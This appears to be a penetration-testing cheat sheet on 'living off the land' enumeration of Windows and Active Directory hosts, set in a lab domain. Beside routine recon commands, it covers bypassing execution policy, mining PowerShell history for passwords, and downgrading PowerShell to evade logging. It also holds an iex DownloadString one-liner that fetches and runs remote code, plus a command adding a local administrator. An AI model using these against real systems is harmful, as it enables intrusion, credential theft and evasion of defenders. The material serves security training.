🚜Living Off the Land

These methods use native Windows tools to perform enumeration within our Windows host. This can be a more stealthy approach and may not create as many log entries and alerts as we would otherwise get from pulling tools into the network.

Env Commands for Host & Network Recon

Basic Enumeration Commands

Command	Result
hostname	Prints the PC's Name
[System.Environment]::OSVersion.Version	Prints out the OS version and revision level
wmic qfe get Caption,Description,HotFixID,InstalledOn	Prints the patches and hotfixes applied to the host
ipconfig /all	Prints out network adapter state and configurations
set	Displays a list of environment variables for the current session (ran from CMD-prompt)
echo %USERDOMAIN%	Displays the domain name to which the host belongs (ran from CMD-prompt)
echo %logonserver%	Prints out the name of the Domain controller the host checks in with (ran from CMD-prompt)

PowerShell

Cmd-Let	Description
Get-Module	Lists available modules loaded for use.
Get-ExecutionPolicy -List	Will print the execution policy settings for each scope on a host.
Set-ExecutionPolicy Bypass -Scope Process	This will change the policy for our current process using the -Scope parameter. Doing so will revert the policy once we vacate the process or terminate it. This is ideal because we won't be making a permanent change to the victim host.
Get-Content C:\Users\<USERNAME>\AppData\Roaming\Microsoft\Windows\Powershell\PSReadline\ConsoleHost_history.txt	With this string, we can get the specified user's PowerShell history. This can be quite helpful as the command history may contain passwords or point us towards configuration files or scripts that contain passwords.
Get-ChildItem Env: | ft Key,Value	Return environment values such as key paths, users, computer information, etc.
powershell -nop -c "iex(New-Object Net.WebClient).DownloadString('URL to download the file from'); <follow-on commands>"	This is a quick and easy way to download a file from the web using PowerShell and call it from memory.

Quick PowerShell Checks

Basic enumeration of the host.

Get-Module
Get-ExecutionPolicy -List

whoami
Get-ChildItem Env: | ft key,value

Several version of PowerShell often exists on a host if not they have not been uninstalled. We can attempt to use a lower version such as 2.0 or older to avoid PowerShell event logging, this will help remain undetected.

Downgrade PowerShell

We must be aware that although our action in PowerShell 2.0 will not be logged the action of downgrading PowerShell itself will still be logged.

Get-host
powershell.exe -version 2

Checking Defenses

The commands netsh and sc can help us get a feel for the state of the host when it comes to Windows Firewall and the status of Windows Defender.

Firewall Check

netsh advfirewall show allprofiles

Windows Defender Check

sc query windefend

Get-MpComputerStatus

Check the status and config setting of Windows defender

Get-MpComputerStatus

Checking to See If Other Users are Logged on

When landing on a host it's a good idea to see who else is logged on.

qwinsta

Network Information

Networking Commands	Description
arp -a	Lists all known hosts stored in the arp table.
ipconfig /all	Prints out adapter settings for the host. We can figure out the network segment from here.
route print	Displays the routing table (IPv4 & IPv6) identifying known networks and layer three routes shared with the host.
netsh advfirewall show state	Displays the status of the host's firewall. We can determine if it is active and filtering traffic.

Using arp- a and route print is great to enumerate an AD environment but will also help in identifying opportunities to pivot to different networks in the environment.

Windows Management Instrumentation

WMI is a scripting engine that is widely used within Windows enterprise environments to retrieve information and run admin tasks on local remote hosts.

Quick WMI Checks

Command	Description
wmic qfe get Caption,Description,HotFixID,InstalledOn	Prints the patch level and description of the Hotfixes applied
wmic computersystem get Name,Domain,Manufacturer,Model,Username,Roles /format:List	Displays basic host information to include any attributes within the list
wmic process list /format:list	A listing of all processes on host
wmic ntdomain list /format:list	Displays information about the Domain and Domain Controllers
wmic useraccount list /format:list	Displays information about all local accounts and any domain accounts that have logged into the device
wmic group list /format:list	Information about all local groups
wmic sysaccount list /format:list	Dumps information about any system accounts that are being used as service accounts.

Net Commands

These can be very useful when we need to enumerate information from the domain. We can use the commands to query the local and remote hosts and list information such as:

• Local and domain users

• Groups

• Hosts

• Password Requirements

• Domain Controllers

Table of Useful Net Commands

Command	Description
net accounts	Information about password requirements
net accounts /domain	Password and lockout policy
net group /domain	Information about domain groups
net group "Domain Admins" /domain	List users with domain admin privileges
net group "domain computers" /domain	List of PCs connected to the domain
net group "Domain Controllers" /domain	List PC accounts of domains controllers
net group <domain_group_name> /domain	User that belongs to the group
net groups /domain	List of domain groups
net localgroup	All available groups
net localgroup administrators /domain	List users that belong to the administrators group inside the domain (the group Domain Admins is included here by default)
net localgroup Administrators	Information about a group (admins)
net localgroup administrators [username] /add	Add user to administrators
net share	Check current shares
net user <ACCOUNT_NAME> /domain	Get information about a user within the domain
net user /domain	List all users of the domain
net user %username%	Information about the current user
net use x: \computer\share	Mount the share locally
net view	Get a list of computers
net view /all /domain[:domainname]	Shares on the domains
net view \computer /ALL	List shares of a computer
net view /domain	List of PCs of the domain

Listing Domain Groups

net group /domain

Information about a Domain User

net user /domain wrouse

Net Commands Tricks

If we think that network defenders are actively logging for any commands out the normal one we can try use net1 instead of net to execute the same function.

Dsquery

A helpful command line tool that can be used to find AD objects. Dsquery will exist on any host with the AD Domain Services Role installed and can be found at C:\Windows\System32\dsquery.dll

Dsquery DLL

To run Dsquery all we need elevated privileges or the ability to run an instance of CMD prompt or PowerShell from a SYSTEM context.

User Search

dsquery user

Computer Search

dsquery computer

Wildcard Search

 dsquery * "CN=Users,DC=INLANEFREIGHT,DC=LOCAL"

Users With Specific Attributes Set (PASSWD_NOTREQD)

dsquery * -filter "(&(objectCategory=person)(objectClass=user)(userAccountControl:1.2.840.113556.1.4.803:=32))" -attr distinguishedName userAccountControl

Searching for Domain Controllers

PS C:\Users\forend.INLANEFREIGHT> dsquery * -filter "(userAccountControl:1.2.840.113556.1.4.803:=8192)" -limit 5 -attr sAMAccountName

LDAP Filtering

The string above may seem weird in the context they are used. These strings are common LDAP queries that can be used with many different tools.

serAccountControl:1.2.840.113556.1.4.803:=8192 Show we are looking at the UAC (User Account Control) attributes for an object. This portion of the string can change to include three different values when searching for information in AD, this is known as OIDs (Object Identifiers).

The =8192 represents the decimal bitmask we want to match in this search and it will correspond to a UAC attribute flag that determines if an attribute such as password is not required is set.